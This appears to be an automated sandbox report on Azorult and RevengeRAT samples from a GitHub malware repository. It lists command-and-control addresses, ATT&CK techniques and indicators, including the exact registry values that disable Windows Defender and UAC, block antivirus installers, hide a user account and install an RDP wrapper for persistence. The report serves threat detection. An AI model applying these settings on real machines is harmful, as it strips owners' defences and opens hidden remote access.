azorult | hxxps://github[.]com/Da2dalus/The-MALWARE-Repo

Analysis

max time kernel
323s
max time network
328s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
14-08-2024 21:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Da2dalus/The-MALWARE-Repo

Score

10^/10

azorult revengerat rms guest defense_evasion discovery evasion execution infostealer lateral_movement persistence privilege_escalation rat stealer trojan upx

Malware Config

Extracted

Family

revengerat

Botnet

Guest

0.tcp.ngrok.io:19521

Mutex

RV_MUTEX

Extracted

Family

azorult

http://boglogov.site/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	taskhostw.exe

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
RevengeRAT
Remote-access trojan with a wide range of capabilities.
trojan revengerat

UAC bypass 3 TTPs 5 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	regedit.exe

Windows security bypass 2 TTPs 1 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	regedit.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
5976	net.exe
6628	net1.exe

RevengeRat Executable 1 IoCs

stealer

resource	yara_rule
behavioral1/files/0x000f0000000234f9-651.dat	revengerat

Blocks application from running via registry modification 13 IoCs

Adds application to list of disallowed applications.

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe"	Azorult.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe"	Azorult.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe"	Azorult.exe

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Azorult.exe

Modifies Windows Firewall 2 TTPs 23 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5828	netsh.exe
8008	netsh.exe
7752	netsh.exe
7296	netsh.exe
5932	netsh.exe
5904	netsh.exe
3724	netsh.exe
7960	netsh.exe
7276	netsh.exe
5340	netsh.exe
7388	netsh.exe
7640	netsh.exe
5368	netsh.exe
5884	netsh.exe
8152	netsh.exe
6656	netsh.exe
392	netsh.exe
7480	netsh.exe
8036	netsh.exe
3092	netsh.exe
7476	netsh.exe
7620	netsh.exe
7556	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Sets file to hidden 1 TTPs 3 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
5520	attrib.exe
7412	attrib.exe
6124	attrib.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 12 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	AdwereCleaner.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	wini.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	winlog.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	winlogon.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	R8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	taskhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	Azorult.exe

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe	RegSvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe\:Zone.Identifier:$DATA	RegSvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe	RegSvcs.exe

Executes dropped EXE 30 IoCs

pid	Process
5252	RevengeRAT(1).exe
5720	AdwereCleaner.exe
2432	6AdwCleaner.exe
5760	svchost.exe
6312	svchost.exe
7964	Azorult.exe
8152	wini.exe
7504	winit.exe
6724	rutserv.exe
7672	rutserv.exe
3724	rutserv.exe
7720	rutserv.exe
5972	rfusclient.exe
5396	rfusclient.exe
8032	cheat.exe
3828	ink.exe
7628	taskhost.exe
7824	P.exe
6040	rfusclient.exe
4640	R8.exe
748	winlog.exe
8060	winlogon.exe
5368	Rar.exe
1592	RDPWInst.exe
5940	taskhostw.exe
7764	winlogon.exe
4244	taskhostw.exe
7444	RDPWInst.exe
5368	taskhostw.exe
7512	taskhostw.exe

Loads dropped DLL 3 IoCs

pid	Process
7544	Windows XP Horror Edition.exe
7392	svchost.exe
5732	Windows XP Horror Edition.exe

Modifies file permissions 1 TTPs 62 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
7432	icacls.exe
7256	icacls.exe
6096	icacls.exe
7960	icacls.exe
7508	icacls.exe
6612	icacls.exe
5732	icacls.exe
7748	icacls.exe
4252	icacls.exe
5900	icacls.exe
8160	icacls.exe
7340	icacls.exe
7948	icacls.exe
756	icacls.exe
7488	icacls.exe
7268	icacls.exe
8080	icacls.exe
1188	icacls.exe
7916	icacls.exe
5960	icacls.exe
2000	icacls.exe
7868	icacls.exe
7780	icacls.exe
3980	icacls.exe
7272	icacls.exe
5732	icacls.exe
7532	icacls.exe
7900	icacls.exe
5652	icacls.exe
5980	icacls.exe
7676	icacls.exe
8188	icacls.exe
7260	icacls.exe
7900	icacls.exe
7492	icacls.exe
4812	icacls.exe
7784	icacls.exe
4456	icacls.exe
8024	icacls.exe
7816	icacls.exe
7556	icacls.exe
3676	icacls.exe
760	icacls.exe
6704	icacls.exe
7772	icacls.exe
7892	icacls.exe
2128	icacls.exe
3216	icacls.exe
5948	icacls.exe
5944	icacls.exe
3232	icacls.exe
960	icacls.exe
6664	icacls.exe
5932	icacls.exe
7592	icacls.exe
7672	icacls.exe
7584	icacls.exe
5568	icacls.exe
6364	icacls.exe
7676	icacls.exe
6724	icacls.exe
7292	icacls.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000800000002388d-3104.dat	upx
behavioral1/memory/8060-3108-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/8060-3136-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/files/0x000a000000023533-3164.dat	upx
behavioral1/memory/7764-3169-0x0000000000B20000-0x0000000000C0C000-memory.dmp	upx
behavioral1/memory/7764-3171-0x0000000000B20000-0x0000000000C0C000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdwCleaner = "\"C:\\Users\\Admin\\AppData\\Local\\6AdwCleaner.exe\" -auto"	6AdwCleaner.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svchost.exe"	RegSvcs.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
7528	powershell.exe

Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

Clear artifacts associated with previously established persistence like scheduletasks on a host.

defense_evasion

Clear Persistence

T1070.009

pid	Process
7900	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 21 IoCs

Web Service

T1102

flow	ioc
105	raw.githubusercontent.com
996	0.tcp.ngrok.io
1000	raw.githubusercontent.com
1003	iplogger.org
1025	0.tcp.ngrok.io
104	raw.githubusercontent.com
109	0.tcp.ngrok.io
979	0.tcp.ngrok.io
1028	0.tcp.ngrok.io
1069	0.tcp.ngrok.io
179	0.tcp.ngrok.io
1011	raw.githubusercontent.com
1013	raw.githubusercontent.com
1030	0.tcp.ngrok.io
1032	0.tcp.ngrok.io
1053	0.tcp.ngrok.io
102	raw.githubusercontent.com
103	raw.githubusercontent.com
459	0.tcp.ngrok.io
1004	iplogger.org
1009	0.tcp.ngrok.io

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
989	ip-api.com

Modifies WinLogon 2 TTPs 7 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult.exe

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

AutoIT Executable 4 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0007000000023565-2795.dat	autoit_exe
behavioral1/files/0x000d000000023657-2962.dat	autoit_exe
behavioral1/files/0x000700000002384b-3037.dat	autoit_exe
behavioral1/memory/7764-3171-0x0000000000B20000-0x0000000000C0C000-memory.dmp	autoit_exe

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	powershell.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	powershell.exe
File created	C:\Windows\System32\rfxvmt.dll	RDPWInst.exe

Hide Artifacts: Hidden Users 1 TTPs 4 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	regedit.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 5252 set thread context of 5400	5252	RevengeRAT(1).exe	107
PID 5400 set thread context of 5464	5400	RegSvcs.exe	108
PID 5760 set thread context of 1236	5760	svchost.exe	163
PID 1236 set thread context of 5720	1236	RegSvcs.exe	164
PID 6312 set thread context of 6300	6312	svchost.exe	226
PID 6300 set thread context of 6112	6300	RegSvcs.exe	227

Drops file in Program Files directory 27 IoCs

description	ioc	Process
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.dll	attrib.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	attrib.exe
File opened for modification	C:\Program Files (x86)\AVAST Software	Azorult.exe
File opened for modification	C:\Program Files (x86)\Cezurity	Azorult.exe
File opened for modification	C:\Program Files\ESET	Azorult.exe
File opened for modification	C:\Program Files (x86)\Panda Security	Azorult.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	Azorult.exe
File opened for modification	C:\Program Files\AVG	Azorult.exe
File opened for modification	C:\Program Files\SpyHunter	Azorult.exe
File opened for modification	C:\Program Files\Enigma Software Group	Azorult.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	Azorult.exe
File opened for modification	C:\Program Files\ByteFence	Azorult.exe
File opened for modification	C:\Program Files (x86)\360	Azorult.exe
File opened for modification	C:\Program Files\Malwarebytes	Azorult.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	Azorult.exe
File opened for modification	C:\Program Files\COMODO	Azorult.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	Azorult.exe
File opened for modification	C:\Program Files (x86)\AVG	Azorult.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files\RDP Wrapper	attrib.exe
File opened for modification	C:\Program Files (x86)\Zaxar	Azorult.exe
File opened for modification	C:\Program Files\Kaspersky Lab	Azorult.exe
File opened for modification	C:\Program Files\Cezurity	Azorult.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	Azorult.exe
File opened for modification	C:\Program Files\AVAST Software	Azorult.exe
File opened for modification	C:\Program Files\Common Files\McAfee	Azorult.exe

Launches sc.exe 24 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
7976	sc.exe
8076	sc.exe
8164	sc.exe
7560	sc.exe
5916	sc.exe
4640	sc.exe
6096	sc.exe
7624	sc.exe
1744	sc.exe
6112	sc.exe
3724	sc.exe
8004	sc.exe
7440	sc.exe
6024	sc.exe
8028	sc.exe
7772	sc.exe
5244	sc.exe
6312	sc.exe
4252	sc.exe
8064	sc.exe
8020	sc.exe
3744	sc.exe
7556	sc.exe
7564	sc.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 10 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File created	C:\Users\Admin\Downloads\RevengeRAT(1).exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\AdwereCleaner.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Azorult.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Azorult(5).exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\RevengeRAT.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Azorult(1).exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Azorult(2).exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Azorult(4).exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Azorult(3).exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Azorult(6).exe:Zone.Identifier	firefox.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
